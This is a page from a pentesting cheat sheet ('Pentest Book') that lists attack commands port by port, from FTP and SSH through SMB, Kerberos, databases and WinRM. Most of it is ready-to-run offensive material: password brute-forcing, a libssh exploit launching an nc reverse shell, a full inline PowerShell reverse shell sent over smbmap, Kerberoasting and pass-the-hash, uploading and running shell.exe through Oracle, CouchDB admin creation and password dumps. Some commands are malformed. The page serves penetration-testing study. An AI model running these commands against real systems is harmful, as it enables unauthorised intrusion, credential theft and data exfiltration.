Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
Ports

General

Port 21 - FTP

1
nmap --script ftp-* -p 21 10.11.1.111
Copied!

Port 22 - SSH

  • If you have usernames test login with username:username
  • Vulnerable Versions to user enum: <7.7
1
# Enum SSH
2
# Get version
3
nmap 10.11.1.1 -p22 -sV
4
# Get banner
5
nc 10.11.1.1 22
6
# Get login banner
7
ssh [email protected]
8
# Get algorythms supporteed
9
nmap -p22 10.11.1.1 --script ssh2-enum-algos
10
# Check weak keys
11
nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full
12
# Check auth methods
13
nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"
14
15
# User can ask to execute a command right after authentication before it’s default command or shell is executed
16
$ ssh -v [email protected] id
17
...
18
Password:
19
debug1: Authentication succeeded (keyboard-interactive).
20
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
21
debug1: channel 0: new [client-session]
22
debug1: Requesting [email protected]
23
debug1: Entering interactive session.
24
debug1: pledge: network
25
debug1: client_input_global_request: rtype [email protected] want_reply 0
26
debug1: Sending command: id
27
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
28
debug1: client_input_channel_req: channel 0 rtype [email protected] reply 0
29
uid=1000(user) gid=100(users) groups=100(users)
30
debug1: channel 0: free: client-session, nchannels 1
31
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
32
Bytes per second: sent 43133.4, received 44349.5
33
debug1: Exit status 0
34
35
# Check Auth Methods:
36
$ ssh -v 10.10.1.111
37
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
38
...
39
debug1: Authentications that can continue: publickey,password,keyboard-interactive
40
41
# Force Auth Method:
42
$ ssh -v 10.10.1.111 -o PreferredAuthentications=password
43
...
44
debug1: Next authentication method: password
45
46
# BruteForce:
47
patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
48
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
49
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
50
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111
51
52
# LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
53
# Id
54
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id
55
# Reverse
56
python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"
57
58
# SSH FUZZ
59
# https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
60
61
# cpan Net::SSH2
62
./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user
63
64
use auxiliary/fuzzers/ssh/ssh_version_2
65
66
# SSH-AUDIT
67
# https://github.com/arthepsy/ssh-audit
68
69
# Enum users < 7.7:
70
# https://www.exploit-db.com/exploits/45233
71
https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
72
python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
73
74
# SSH Leaks:
75
https://shhgit.darkport.co.uk/
76
77
# SSH bruteforce
78
# https://github.com/kitabisa/ssb
Copied!

Port 23 - Telnet

1
# Get banner
2
telnet 10.11.1.110
3
# Bruteforce password
4
patator telnet_login host=10.11.1.110 inputs='FILE0\nFILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'
Copied!

Port 25 - SMTP

1
nc -nvv 10.11.1.111 25
2
HELO foo
3
4
telnet 10.11.1.111 25
5
VRFY root
6
7
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.111
8
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.111
9
10
# SMTP relay
11
msfconsole
12
use auxiliary/scanner/smtp/smtp_relay
13
set RHOSTS <IP or File>
14
set MAILFROM <PoC email address>
15
set MAILTO <your email address>
16
run
17
18
# Send email unauth:
19
20
MAIL FROM:[email protected]
21
RCPT TO:[email protected]
22
DATA
23
test
24
25
.
26
27
Receive:
28
250 OK
Copied!

Port 43 - Whois

1
whois -h 10.10.1.111 -p 43 "domain.com"
2
echo "domain.com" | nc -vn 10.10.1.111 43
3
whois -h 10.10.1.111 -p 43 "a') or 1=1#"
Copied!

Port 53 - DNS

1
# Transfer zone
2
3
dig AXFR domain.com @10.10.10.10
4
# dig +multi AXFR @ns1.insecuredns.com insecuredns.com
5
dnsrecon -t axfr -d domain
6
fierce -dns domain.com
Copied!

Port 69 - UDP - TFTP

  • Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
  • Same checks as FTP Port 21.
1
nmap -p69 --script=tftp-enum.nse 10.11.1.111
Copied!

Port 79 - Finger

1
nc -vn 10.11.1.111 79
2
echo "root" | nc -vn 10.11.1.111 79
3
4
# User enumeration
5
finger @10.11.1.111 #List users
6
finger [email protected] #Get info of user
7
finger [email protected] #Get info of user
8
9
finger "|/bin/[email protected]"
10
finger "|/bin/ls -a /@example.com"
Copied!

Port 88 - Kerberos

Check Kerberos dedicated section
1
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
2
use auxiliary/gather/kerberos_enumusers # MSF
3
4
# Check for Kerberoasting:
5
GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
6
7
# GetUserSPNs
8
ASREPRoast:
9
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
10
impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
11
12
# Kerberoasting:
13
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
14
15
# Overpass The Hash/Pass The Key (PTK):
16
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
17
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
18
python3 getTGT.py <domain_name>/<user_name>:[password]
19
20
# Using TGT key to excute remote commands from the following impacket scripts:
21
22
python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
23
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
24
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
25
26
# https://www.tarlogic.com/blog/como-funciona-kerberos/
27
# https://www.tarlogic.com/blog/como-atacar-kerberos/
28
29
python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
30
31
# https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
32
# https://github.com/GhostPack/Rubeus
33
# https://github.com/fireeye/SSSDKCMExtractor
34
# https://gitlab.com/Zer1t0/cerbero
Copied!

Port 110 - Pop3

1
telnet 10.11.1.111
2
USER [email protected]
3
PASS admin
4
5
# or:
6
7
USER pelle
8
PASS admin
9
10
# List all emails
11
list
12
13
# Retrieve email number 5, for example
14
retr 9
Copied!

Port 111 - Rpcbind

1
rpcinfo -p 10.11.1.111
2
rpcclient -U "" 10.11.1.111
3
srvinfo
4
enumdomusers
5
getdompwinfo
6
querydominfo
7
netshareenum
8
netshareenumall
Copied!

Port 135 - MSRPC

Some versions are vulnerable.
1
nmap 10.11.1.111 --script=msrpc-enum
2
msf > use exploit/windows/dcerpc/ms03_026_dcom
3
4
# Endpoint Mapper Service Discovery
5
use auxiliary/scanner/dcerpc/endpoint_mapper
6
7
#Hidden DCERPC Service Discovery
8
use auxiliary/scanner/dcerpc/hidden
9
10
# Remote Management Interface Discovery
11
use auxiliary/scanner/dcerpc/management
12
13
# DCERPC TCP Service Auditor
14
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
15
16
impacket-rpcdump
17
18
# Enum network interface
19
# https://github.com/mubix/IOXIDResolver
Copied!
Named pipe
Description
Service or process
Interface identifier
atsvc
atsvc interface (Scheduler service)
mstask.exe
1ff70682-0a51-30e8-076d-740be8cee98b v1.0
AudioSrv
AudioSrv interface (Windows Audio service)
AudioSrv
3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.0
browser (ntsvcs alias)
browser interface (Computer Browser service)
Browser
6bffd098-a112-3610-9833-012892020162 v0.0
cert
ICertPassage interface (Certificate services)
certsrv.exe
91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0
Ctx_Winstation_API_Service
winstation_rpc interface
termsrv.exe
5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0
DAV RPC SERVICE
davclntrpc interface (WebDAV client service)
WebClient
c8cb7687-e6d3-11d2-a958-00c04f682e16 v1.0
dnsserver
DnsServer interface (DNS Server service)
dns.exe
50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0
epmapper
epmp interface (RPC endpoint mapper)
RpcSs
e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0
eventlog (ntsvcs alias)
eventlog interface (Eventlog service)
Eventlog
82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
HydraLsPipe
Terminal Server Licensing
lserver.exe
3d267954-eeb7-11d1-b94e-00c04fa3080d v1.0
InitShutdown
InitShutdown interface
winlogon.exe
894de0c0-0d55-11d3-a322-00c04fa321a1 v1.0
keysvc
IKeySvc interface (Cryptographic services)
CryptSvc
8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
keysvc
ICertProtect interface (Cryptographic services)
CryptSvc
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
locator
NsiS interface (RPC Locator service)
locator.exe
d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 v1.0
llsrpc
llsrpc interface (Licensing Logging service)
llssrv.exe
342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0
lsarpc (lsass alias)
lsarpc interface
lsass.exe
12345778-1234-abcd-ef00-0123456789ab v0.0
lsarpc (lsass alias)
dssetup interface
lsass.exe
3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0
msgsvc (ntsvcs alias)
msgsvcsend interface (Messenger service)
messenger
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
nddeapi
nddeapi interface (NetDDE service)
netdde.exe
2f5f3220-c126-1076-b549-074d078619da v1.2
netdfs
netdfs interface (Distributed File System service)
Dfssvc
4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0
netlogon (lsass alias)
netlogon interface (Net Logon service)
Netlogon
12345678-1234-abcd-ef00-01234567cffb v1.0
ntsvcs
pnp interface (Plug and Play service)
PlugPlay
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
plugplay
pnp interface (Plug and Play Windows Vista service)
PlugPlay
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
policyagent
PolicyAgent interface (IPSEC Policy Agent (Windows 2000))
PolicyAgent
d335b8f6-cb31-11d0-b0f9-006097ba4e54 v1.5
ipsec
winipsec interface (IPsec Services)
PolicyAgent
12345678-1234-abcd-ef00-0123456789ab v1.0
ProfMapApi
pmapapi interface
winlogon.exe
369ce4f0-0fdc-11d3-bde8-00c04f8eee78 v1.0
protected_storage
IPStoreProv interface (Protected Storage)
lsass.exe
c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
ROUTER
Remote Access
mprdim.dll
8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0
samr (lsass alias)
samr interface
lsass.exe
12345778-1234-abcd-ef00-0123456789ac v1.0
scerpc
SceSvc
services.exe
93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
SECLOGON
ISeclogon interface (Secondary logon service)
seclogon
12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0
SfcApi
sfcapi interface (Windows File Protection)
winlogon.exe
83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0
spoolss
spoolss interface (Spooler service)
spoolsv.exe
12345678-1234-abcd-ef00-0123456789ab v1.0
srvsvc (ntsvcs alias)
srvsvc interface (Server service)
services.exe (w2k) or svchost.exe (wxp and w2k3)
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
ssdpsrv
ssdpsrv interface (SSDP service)
ssdpsrv
4b112204-0e19-11d3-b42b-0000f81feb9f v1.0
svcctl (ntsvcs alias)
svcctl interface (Services control manager)
services.exe
367aeb81-9844-35f1-ad32-98f038001003 v2.0
tapsrv
tapsrv interface (Telephony service)
Tapisrv
2f5f6520-ca46-1067-b319-00dd010662da v1.0
trkwks
trkwks interface (Distributed Link Tracking Client)
Trkwks
300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
W32TIME (ntsvcs alias)
w32time interface (Windows Time (Windows 2000 and XP))
w32time
8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1
W32TIME_ALT
w32time interface (Windows Time (Windows Server 2003, Windows Vista))
w32time
8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1
winlogonrpc
GetUserToken interface
winlogon.exe
a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 v1.0
winreg
winreg interface (Remote registry service)
RemoteRegistry
338cd001-2244-31f1-aaaa-900038001003 v1.0
winspipe
winsif interface (WINS service)
wins.exe
45f52c28-7f9f-101a-b52b-08002b2efabe v1.0
wkssvc (ntsvcs alias)
wkssvc interface (Workstation service)
services.exe (w2k) or svchost.exe (wxp and w2k3)
6bffd098-a112-3610-9833-46c3f87e345a v1.0

Port 139/445 - SMB

1
# Enum hostname
2
enum4linux -n 10.11.1.111
3
nmblookup -A 10.11.1.111
4
nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111
5
6
# Get Version
7
smbver.sh 10.11.1.111
8
Msfconsole;use scanner/smb/smb_version
9
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
10
smbclient -L \\\\10.11.1.111
11
12
# Get Shares
13
smbmap -H 10.11.1.111 -R
14
echo exit | smbclient -L \\\\10.11.1.111
15
smbclient \\\\10.11.1.111\\
16
smbclient -L //10.11.1.111 -N
17
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
18
smbclient -L \\\\10.11.1.111\\
19
# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
20
smbclient -L //10.11.1.111/ --option='client min protocol=NT1'
21
22
# Check null sessions
23
smbmap -H 10.11.1.111
24
rpcclient -U "" -N 10.11.1.111
25
smbclient //10.11.1.111/IPC$ -N
26
27
# Exploit null sessions
28
enum -s 10.11.1.111
29
enum -U 10.11.1.111
30
enum -P 10.11.1.111
31
enum4linux -a 10.11.1.111
32
#https://github.com/cddmp/enum4linux-ng/
33
enum4linux-ng.py 10.11.1.111 -A -C
34
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111
35
36
# Connect to username shares
37
smbclient //10.11.1.111/share -U username
38
39
# Connect to share anonymously
40
smbclient \\\\10.11.1.111\\
41
smbclient //10.11.1.111/
42
smbclient //10.11.1.111/
43
smbclient //10.11.1.111/<""share name"">
44
rpcclient -U " " 10.11.1.111
45
rpcclient -U " " -N 10.11.1.111
46
47
# Check vulns
48
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111
49
50
# Multi exploits
51
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run
52
53
# Bruteforce login
54
medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
55
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv
56
nmap –script smb-brute 10.11.1.111
57
58
# nmap smb enum & vuln
59
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
60
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111
61
62
# Mount smb volume linux
63
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share
64
65
# rpcclient commands
66
rpcclient -U "" 10.11.1.111
67
srvinfo
68
enumdomusers
69
getdompwinfo
70
querydominfo
71
netshareenum
72
netshareenumall
73
74
# Run cmd over smb from linux
75
winexe -U username //10.11.1.111 "cmd.exe" --system
76
77
# smbmap
78
smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
79
smbmap.py -u username -p '[email protected]$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
80
smbmap.py -H 10.11.1.111 -u username -p '[email protected]$w0rd1234!' -L # Drive Listing
81
smbmap.py -u username -p '[email protected]$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell
82
83
# Check
84
\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "
85
86
# CrackMapExec
87
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
88
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa
89
90
# Impacket
91
python3 samdump.py SMB 172.21.0.0
92
93
# Check for systems with SMB Signing not enabled
94
python3 RunFinger.py -i 172.21.0.0/24
Copied!

Port 161/162 UDP - SNMP

1
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111
2
nmap 10.11.1.111 -Pn -sU -p 161 --script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users
3
snmp-check 10.11.1.111 -c public|private|community
4
snmpwalk -c public -v1 ipaddress 1
5
snmpwalk -c private -v1 ipaddress 1
6
snmpwalk -c manager -v1 ipaddress 1
7
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
8
9
# Impacket
10
python3 samdump.py SNMP 172.21.0.0
11
12
# MSF aux modules
13
auxiliary/scanner/misc/oki_scanner
14
auxiliary/scanner/snmp/aix_version
15
auxiliary/scanner/snmp/arris_dg950
16
auxiliary/scanner/snmp/brocade_enumhash
17
auxiliary/scanner/snmp/cisco_config_tftp
18
auxiliary/scanner/snmp/cisco_upload_file
19
auxiliary/scanner/snmp/cnpilot_r_snmp_loot
20
auxiliary/scanner/snmp/epmp1000_snmp_loot
21
auxiliary/scanner/snmp/netopia_enum
22
auxiliary/scanner/snmp/sbg6580_enum
23
auxiliary/scanner/snmp/snmp_enum
24
auxiliary/scanner/snmp/snmp_enum_hp_laserjet
25
auxiliary/scanner/snmp/snmp_enumshares
26
auxiliary/scanner/snmp/snmp_enumusers
27
auxiliary/scanner/snmp/snmp_login
Copied!

Port 389,636 - LDAP

Check AD section
1
jxplorer
2
ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
3
python3 windapsearch.py --dc-ip 10.10.10.182 --users --full > windapsearch_users.txt
4
cat windapsearch_users.txt | grep sAMAccountName | cut -d " " -f 2 > users.txt
5
# Check # https://github.com/ropnop/go-windapsearch
Copied!

Port 443 - HTTPS

Read the actual SSL CERT to:
  • find out potential correct vhost to GET
  • is the clock skewed
  • any names that could be usernames for bruteforce/guessing.
1
./testssl.sh -e -E -f -p -S -P -c -H -U TARGET-HOST > OUTPUT-FILE.html
2
# Check for mod_ssl,OpenSSL version Openfuck
Copied!

Port 500 - ISAKMP IKE

1
ike-scan 10.11.1.111
Copied!

Port 513 - Rlogin

1
apt install rsh-client
2
rlogin -l root 10.11.1.111
Copied!

Port 541 - FortiNet SSLVPN

Port 1433 - MSSQL

1
nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
2
use auxiliary/scanner/mssql/mssql_ping
3
use auxiliary/scanner/mssql/mssql_login
4
use exploit/windows/mssql/mssql_payload
5
sqsh -S 10.11.1.111 -U sa
6
xp_cmdshell 'date'
7
go
8
9
10
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami")'
11
12
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
Copied!

Port 1521 - Oracle

1
oscanner -s 10.11.1.111 -P 1521
2
tnscmd10g version -h 10.11.1.111
3
tnscmd10g status -h 10.11.1.111
4
nmap -p 1521 -A 10.11.1.111
5
nmap -p 1521 --script=oracle-tns-version,oracle-sid-brute,oracle-brute
6
MSF: good modules under auxiliary/admin/oracle and scanner/oracle
7
8
# https://github.com/quentinhardy/odat
9
./odat-libc2.5-i686 all -s 10.11.1.111 -p 1521
10
./odat-libc2.5-i686 sidguesser -s 10.11.1.111 -p 1521
11
./odat-libc2.5-i686 passwordguesser -s 10.11.1.111 -p 1521 -d XE
12
13
# Upload reverse shell with ODAT:
14
./odat-libc2.5-i686 utlfile -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe /root/shell.exe
15
16
# and run it:
17
./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
Copied!

Port 2000 - Cisco sccp

1
# cisco-audit-tool
2
CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt
3
4
# cisco-smart-install
5
https://github.com/Sab0tag3d/SIET/
6
sudo python siet.py -g -i 192.168.0.1
Copied!

Port 2049 - NFS

1
nmap -p 111,2049 --script nfs-ls,nfs-showmount
2
3
showmount -e 10.11.1.111
4
5
# If you find anything you can mount it like this:
6
7
mount 10.11.1.111:/ /tmp/NFS –o nolock
8
mount -t nfs 10.11.1.111:/ /tmp/NFS –o nolock
Copied!

Port 2100 - Oracle XML DB

Default passwords:

Port 3306 - MySQL

1
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
2
3
mysql --host=10.11.1.111 -u root -p
4
5
# MYSQL UDF 4.x/5.0
6
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
Copied!

Port 3389 - RDP

1
nmap -p 3389 --script=rdp-vuln-ms12-020.nse
2
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.11.1.111
3
rdesktop -u guest -p guest 10.11.1.111 -g 94%
4
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://10.11.1.111
5
python crowbar.py -b rdp -s 10.11.1.111/32 -u admin -C ../rockyou.txt -v
Copied!

Port 5432 - PostgreSQL

1
psql -h 10.10.1.111 -U postgres -W
2
3
# Default creds
4
postgres : postgres
5
postgres : password
6
postgres : admin
7
admin : admin
8
admin : password
9
10
pg_dump --host=10.10.1.111 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
Copied!

Port 5900 - VNC

1
nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111
Copied!

Port 5984 - CouchDB

1
curl http://example.com:5984/
2
curl -X GET http://IP:5984/_all_dbs
3
curl -X GET http://user:[email protected]:5984/_all_dbs
4
5
# CVE-2017-12635 RCE
6
7
# Create user
8
curl -X PUT ‘http://localhost:5984/_users/org.couchdb.user:chenny' — data-binary ‘{ “type”: “user”, “name”: “chenny”, “roles”: [“_admin”], “roles”: [], “password”: “password” }
9
10
# Dump database
11
curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u chenny:-Xpassword <ds/_all_docs?include_docs=true -u chenny:-Xpassword
12
13
# Dump passwords
14
curl -X GET http://user:[email protected]:5984/passwords
Copied!

Port 5985 - WinRM

1
# https://github.com/Hackplayers/evil-winrm
2
gem install evil-winrm
3
evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
4
evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
Copied!

Port 6379 - Redis

1
# https://github.com/Avinash-acid/Redis-Server-Exploit
2
python redis.py 10.10.10.160 redis
Copied!

Port 8172 - MsDeploy

1
# Microsoft IIS Deploy port
2
IP:8172/msdeploy.axd
Copied!

Port 5601/9200

ELK

Port 27017-19/27080/28017 - MongoDB

MongoDB

Unknown ports

  • amap -d 10.11.1.111 8000
  • netcat: makes connections to ports. Can echo strings or give shells: nc -nv 10.11.1.111 110
  • sfuzz: can connect to ports, udp or tcp, refrain from closing a connection, using basic HTTP configurations

RCE ports

Enumeration - Previous
SSL/TLS
Next - Enumeration
Web Attacks
Last modified 7mo ago
Export as PDF
Copy link
Edit on GitHub
Contents
General
Port 21 - FTP
Port 22 - SSH
Port 23 - Telnet
Port 25 - SMTP
Port 43 - Whois
Port 53 - DNS
Port 69 - UDP - TFTP
Port 79 - Finger
Port 88 - Kerberos
Port 110 - Pop3
Port 111 - Rpcbind
Port 135 - MSRPC
Port 139/445 - SMB
Port 161/162 UDP - SNMP
Port 389,636 - LDAP
Port 443 - HTTPS
Port 500 - ISAKMP IKE
Port 513 - Rlogin
Port 541 - FortiNet SSLVPN
Port 1433 - MSSQL
Port 1521 - Oracle
Port 2000 - Cisco sccp
Port 2049 - NFS
Port 2100 - Oracle XML DB
Port 3306 - MySQL
Port 3389 - RDP
Port 5432 - PostgreSQL
Port 5900 - VNC
Port 5984 - CouchDB
Port 5985 - WinRM
Port 6379 - Redis
Port 8172 - MsDeploy
Port 5601/9200
Port 27017-19/27080/28017 - MongoDB
Unknown ports
RCE ports